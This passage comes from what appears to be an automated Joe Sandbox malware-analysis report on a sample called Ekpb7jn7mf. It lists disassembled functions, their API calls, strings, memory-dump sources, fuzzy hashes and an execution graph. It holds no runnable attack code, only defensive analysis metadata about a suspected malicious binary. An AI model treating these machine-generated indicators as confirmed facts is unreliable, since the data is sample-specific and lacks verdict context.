                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                  • String ID:
                                                                                  • API String ID: 3058430110-0
                                                                                  • Opcode ID: 81987982e1df4478a7ec8bedb2574ddd47b8dcc3746f19ef86f9e98bcee9ea73
                                                                                  • Instruction ID: 34d96542b4f2f6430d40b5dcf61543c795873935e1d33559ae6edcb8347980b7
                                                                                  • Opcode Fuzzy Hash: 81987982e1df4478a7ec8bedb2574ddd47b8dcc3746f19ef86f9e98bcee9ea73
                                                                                  • Instruction Fuzzy Hash: CD310E31B10265EFDB20DF64E8809BE3BA0FF81310F9585AAE4618B2D0D334CD40CB59
                                                                                  Function 00413A76 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$H_prolog_malloc
                                                                                  • String ID:
                                                                                  • API String ID: 1600808285-0
                                                                                  • Opcode ID: 53866512d70242172bba666a9b8fd675876a63121414b9353fe8f0c4afc2a0ae
                                                                                  • Instruction ID: 8707dbc3ea1c7a206fd2168aec13b39480974cebc03b1d47dee04c1bc00d07d0
                                                                                  • Opcode Fuzzy Hash: 53866512d70242172bba666a9b8fd675876a63121414b9353fe8f0c4afc2a0ae
                                                                                  • Instruction Fuzzy Hash: 6931A2B1E04216ABDB14DF69C8457EB76B8EB14319F10053FE105E7282E778AE80C6AC
                                                                                  Function 00412E25 Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset
                                                                                  • String ID:
                                                                                  • API String ID: 2102423945-0
                                                                                  • Opcode ID: 9d5df03678e0c5d5763a2dcc2e55ed97e5158c9e5106f151ba223aa709053554
                                                                                  • Instruction ID: 1f3416726208f78ed5918f79fcdb11784f1958436039aa26d1951b0feda88d58
                                                                                  • Opcode Fuzzy Hash: 9d5df03678e0c5d5763a2dcc2e55ed97e5158c9e5106f151ba223aa709053554
                                                                                  • Instruction Fuzzy Hash: D5116B71A4878069E221D67A8C45FE3F6DCAB29308F444C2FB3DECB182E5AA74548757
                                                                                  Function 00405F34 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$H_prolog
                                                                                  • String ID:
                                                                                  • API String ID: 3013590873-0
                                                                                  • Opcode ID: 93ce2218eb711f8a3a1566bc0119a61f5b46c0e5ed04685ce2a0b30a240ba023
                                                                                  • Instruction ID: e61058f2c924f18cf44b3716d7199eba2e33b25c3138a383d844bd036fe00bab
                                                                                  • Opcode Fuzzy Hash: 93ce2218eb711f8a3a1566bc0119a61f5b46c0e5ed04685ce2a0b30a240ba023
                                                                                  • Instruction Fuzzy Hash: 170184B1740740BAD221E716CC47FDBB6A8DFC9B18F00081FB259761C2C7BC565086AD
                                                                                  Function 004230DE Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                  • String ID:
                                                                                  • API String ID: 3016257755-0
                                                                                  • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                  • Instruction ID: ad02efd122ed2333f7502648e5777f30876e1af65ebdecf52b8212f03a33dcef
                                                                                  • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                  • Instruction Fuzzy Hash: F711807220005EBBCF125E85ED41CEE3F37BB18355F998416FE1859131C67ACAB2AB85
                                                                                  Function 0040632E Relevance: 6.0, APIs: 4, Instructions: 39windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0040C271: LoadStringW.USER32(?,-004325D2,00000200), ref: 0040C2C2
                                                                                    • Part of subcall function 0040C271: LoadStringW.USER32(?,-004325D2,00000200), ref: 0040C2D4
                                                                                  • _swprintf.LIBCMT ref: 00411829
                                                                                    • Part of subcall function 00401B74: __vswprintf_c_l.LIBCMT ref: 00401B87
                                                                                  • GetLastError.KERNEL32(?), ref: 00411831
                                                                                  • MessageBoxW.USER32(?,00000000,00000096,00000035), ref: 00411853
                                                                                  • SetLastError.KERNEL32(00000000), ref: 00411860
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLastLoadString$Message__vswprintf_c_l_swprintf
                                                                                  • String ID:
                                                                                  • API String ID: 2205000856-0
                                                                                  • Opcode ID: 90b3bf13175ec4f3bd797cc2b11990bc0bd06b311f4a533a60cf7db86b898d9c
                                                                                  • Instruction ID: ed8c194fd9dce5b65a4ab69c32904f4180831e7d0cf7aed1620b8a00417be88f
                                                                                  • Opcode Fuzzy Hash: 90b3bf13175ec4f3bd797cc2b11990bc0bd06b311f4a533a60cf7db86b898d9c
                                                                                  • Instruction Fuzzy Hash: 93F0F632540218BBFB1137A08C4AFCE375CAF16385F0042A7F505F50E2E5799875876D
                                                                                  Function 004220C3 Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • __getptd.LIBCMT ref: 004220CF
                                                                                    • Part of subcall function 0041E764: __getptd_noexit.LIBCMT ref: 0041E767
                                                                                    • Part of subcall function 0041E764: __amsg_exit.LIBCMT ref: 0041E774
                                                                                  • __getptd.LIBCMT ref: 004220E6
                                                                                  • __amsg_exit.LIBCMT ref: 004220F4
                                                                                  • __lock.LIBCMT ref: 00422104
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                  • String ID:
                                                                                  • API String ID: 3521780317-0
                                                                                  • Opcode ID: 9bbfce21fc56b317f6a36a82937c31e252a0bf44d043ae3dcf04175c47f93af7
                                                                                  • Instruction ID: ba531cc4217b4df794b256f33fc1b133dbd71ccaad3f842f0c6843564655d570
                                                                                  • Opcode Fuzzy Hash: 9bbfce21fc56b317f6a36a82937c31e252a0bf44d043ae3dcf04175c47f93af7
                                                                                  • Instruction Fuzzy Hash: A0F06235B00720DBD720FB66A502B9972A16F04718F90416FB951972E1CFBC5981CA5E
                                                                                  Function 0040276E Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 385COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: _swprintf
                                                                                  • String ID: ;%u
                                                                                  • API String ID: 589789837-535004727
                                                                                  • Opcode ID: 041691639bbd541154391281e3a4aaa2f273f69e637fbf8d4a6aa86dd2ac6dcb
                                                                                  • Instruction ID: a0edadda82c9f23437f4239ca8a730b7792abe68c1af6789e4c56d0fcaebc8ca
                                                                                  • Opcode Fuzzy Hash: 041691639bbd541154391281e3a4aaa2f273f69e637fbf8d4a6aa86dd2ac6dcb
                                                                                  • Instruction Fuzzy Hash: C1D113702007449ADB24EF358689BEE77E5AF40304F04053FE956A72D2DBBCA985CB59
                                                                                  Function 00409D17 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 135COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcslen
                                                                                  • String ID: __rar_
                                                                                  • API String ID: 176396367-2561138058
                                                                                  • Opcode ID: a65a0ca25c52315b287b4020813a743e18ca25b1074e3f498088ae359453fe39
                                                                                  • Instruction ID: 7a58e1af0f96e59094e416f3dae6167a4554a84c47e3b8dc4b5b1a955f67997f
                                                                                  • Opcode Fuzzy Hash: a65a0ca25c52315b287b4020813a743e18ca25b1074e3f498088ae359453fe39
                                                                                  • Instruction Fuzzy Hash: 4841D032A00259A6CF21AE65CC81BEF736EAF54354F04047BF809B31D3D63CDE9196A9
                                                                                  Function 0040CDA7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0040CD68: LoadLibraryW.KERNEL32(Crypt32.dll,00000020,0040CDC0,00000020,?,?,00405D34,?,00000020,00000001,00000000,?,00000010,?,?,?), ref: 0040CD76
                                                                                    • Part of subcall function 0040CD68: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0040CD8F
                                                                                    • Part of subcall function 0040CD68: GetProcAddress.KERNEL32(00437800,CryptUnprotectMemory), ref: 0040CD9B
                                                                                  • GetCurrentProcessId.KERNEL32(00000020,?,?,00405D34,?,00000020,00000001,00000000,?,00000010,?,?,?,00000001,?,?), ref: 0040CE2E
                                                                                  Strings
                                                                                  • CryptProtectMemory failed, xrefs: 0040CDEE
                                                                                  • CryptUnprotectMemory failed, xrefs: 0040CE27
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$CurrentLibraryLoadProcess
                                                                                  • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                  • API String ID: 137661620-396321323
                                                                                  • Opcode ID: 198082f2dc4cbed04473a6d5c14103d9a5a2a777f495e332cbfda24714750072
                                                                                  • Instruction ID: 77e1c3413466269c5384ec847ceb783b2336dfca7173b6c82ec737576e481cfa
                                                                                  • Opcode Fuzzy Hash: 198082f2dc4cbed04473a6d5c14103d9a5a2a777f495e332cbfda24714750072
                                                                                  • Instruction Fuzzy Hash: 05110171304115ABDB1A6F64DCD167F3756DB81B10704413FF942AB2C1CA389C9593DD
                                                                                  Function 00410FC5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateThread.KERNEL32(00000000,00010000,00410F67,?,00000000,?), ref: 00410FE9
                                                                                  • SetThreadPriority.KERNEL32(?,00000000,?,?,00411055,-00000108,00404FD8), ref: 00411030
                                                                                    • Part of subcall function 004063AD: __vswprintf_c_l.LIBCMT ref: 004063CB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: Thread$CreatePriority__vswprintf_c_l
                                                                                  • String ID: CreateThread failed
                                                                                  • API String ID: 2655393344-3849766595
                                                                                  • Opcode ID: b8bbcb8923d232472ca76fefd6a4bf110d33c80091c186ad9e7ddcbf006ae7bd
                                                                                  • Instruction ID: 5542f57637ba82aa3817d501c1c8d39191179df7af46df1e3764541aa438c75b
                                                                                  • Opcode Fuzzy Hash: b8bbcb8923d232472ca76fefd6a4bf110d33c80091c186ad9e7ddcbf006ae7bd
                                                                                  • Instruction Fuzzy Hash: 4B012671344305BBD3306F55AD46BB23758EB48766F30003FFA82A2581DAF868D18B6D
                                                                                  Function 0040A091 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcschr_wcspbrk
                                                                                  • String ID: ?*<>|"
                                                                                  • API String ID: 3305141221-226352099
                                                                                  • Opcode ID: 42140c1be0f08571e08a998b25392a297171eed4dcfc96837f1922278b3e00da
                                                                                  • Instruction ID: aa4710ce59c085ced9854f33b6b4169768e0b9bb7120ffb3a45601e14b6e1647
                                                                                  • Opcode Fuzzy Hash: 42140c1be0f08571e08a998b25392a297171eed4dcfc96837f1922278b3e00da
                                                                                  • Instruction Fuzzy Hash: A7F0492511432750DE382E1448056B332D88B11344B60843FE8C1B72C2E77E98EBD12F
                                                                                  Function 0041DC5B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 0041A19E: __getptd.LIBCMT ref: 0041A1A4
                                                                                    • Part of subcall function 0041A19E: __getptd.LIBCMT ref: 0041A1B4
                                                                                  • __getptd.LIBCMT ref: 0041DC6A
                                                                                    • Part of subcall function 0041E764: __getptd_noexit.LIBCMT ref: 0041E767
                                                                                    • Part of subcall function 0041E764: __amsg_exit.LIBCMT ref: 0041E774
                                                                                  • __getptd.LIBCMT ref: 0041DC78
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                  • String ID: csm
                                                                                  • API String ID: 803148776-1018135373
                                                                                  • Opcode ID: e2cc627116b19fb5553d78aab43f447c3cb7cefb71fdbbd70e56117400c6818a
                                                                                  • Instruction ID: 4df0fc6275fc01049fe42caa67c000990fab24198ade6d76edb3c47b82caba46
                                                                                  • Opcode Fuzzy Hash: e2cc627116b19fb5553d78aab43f447c3cb7cefb71fdbbd70e56117400c6818a
                                                                                  • Instruction Fuzzy Hash: 22017CB8C00704CADF24AF29D9406EEB3B5AF10314F14481FE44196791EB7899D0EBC9
                                                                                  Function 00410C6C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,00410E3A,?), ref: 00410C72
                                                                                  • GetLastError.KERNEL32(?), ref: 00410C7E
                                                                                    • Part of subcall function 004063AD: __vswprintf_c_l.LIBCMT ref: 004063CB
                                                                                  Strings
                                                                                  • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00410C87
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                  • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                  • API String ID: 1091760877-2248577382
                                                                                  • Opcode ID: cb8434b4d930f5674dfcd613430442c7000946ec074501a1036af1a50a433364
                                                                                  • Instruction ID: bf88496ac570465f9c3604917b5d80b7473bfed2f73079c342170331bd85cf75
                                                                                  • Opcode Fuzzy Hash: cb8434b4d930f5674dfcd613430442c7000946ec074501a1036af1a50a433364
                                                                                  • Instruction Fuzzy Hash: 2BD02E32608020BBDB013B28AC0AD9E34018F01334FB14722F935722F2DB7D0AB246EE

                                                                                  Execution Graph

                                                                                  Execution Coverage:23.4%
                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                  Signature Coverage:0%
                                                                                  Total number of Nodes:50
                                                                                  Total number of Limit Nodes:2
                                                                                  execution_graph 161 7ff630ce1570 __wgetmainargs 162 7ff630ce15c0 GetStartupInfoW 163 7ff630ce15ff 162->163 164 7ff630ce1611 163->164 165 7ff630ce161a Sleep 163->165 166 7ff630ce1636 _amsg_exit 164->166 167 7ff630ce1644 164->167 165->163 166->167 168 7ff630ce16ba _initterm 167->168 169 7ff630ce169b 167->169 170 7ff630ce16d7 _IsNonwritableInCurrentImage 167->170 168->170 170->169 176 7ff630ce109c EventRegister 170->176 173 7ff630ce17a0 173->169 175 7ff630ce17a9 _cexit 173->175 174 7ff630ce1798 exit 174->173 175->169 177 7ff630ce1111 176->177 178 7ff630ce10f6 EventSetInformation 176->178 179 7ff630ce11e8 ShellExecuteW 177->179 181 7ff630ce114c EventWriteTransfer 177->181 178->177 183 7ff630ce1240 179->183 181->179 182 7ff630ce1218 182->173 182->174 184 7ff630ce1249 183->184 185 7ff630ce1254 184->185 186 7ff630ce1340 RtlCaptureContext RtlLookupFunctionEntry 184->186 185->182 187 7ff630ce1385 RtlVirtualUnwind 186->187 188 7ff630ce13c7 186->188 189 7ff630ce13e9 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 187->189 188->189 189->182 190 7ff630ce1490 192 7ff630ce14a2 190->192 197 7ff630ce1918 GetModuleHandleW 192->197 193 7ff630ce1509 __set_app_type 194 7ff630ce1546 193->194 195 7ff630ce154f __setusermatherr 194->195 196 7ff630ce155c 194->196 195->196 198 7ff630ce192d 197->198 198->193 199 7ff630ce1890 SetUnhandledExceptionFilter 200 7ff630ce1850 201 7ff630ce1882 200->201 202 7ff630ce185f 200->202 202->201 203 7ff630ce187b ?terminate@ 202->203 203->201 204 7ff630ce1830 207 7ff630ce1264 204->207 208 7ff630ce128d 207->208 209 7ff630ce1296 6 API calls 207->209 208->209 210 7ff630ce131b 208->210 209->210 211 7ff630ce1b40 _XcptFilter 212 7ff630ce17d9 213 7ff630ce17f1 212->213 214 7ff630ce17e8 _exit 212->214 215 7ff630ce17fa _cexit 213->215 216 7ff630ce1806 213->216 214->213 215->216

                                                                                  Callgraph

                                                                                  Executed Functions

                                                                                  Function 00007FF630CE15C0 Relevance: 10.6, APIs: 7, Instructions: 143sleepCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
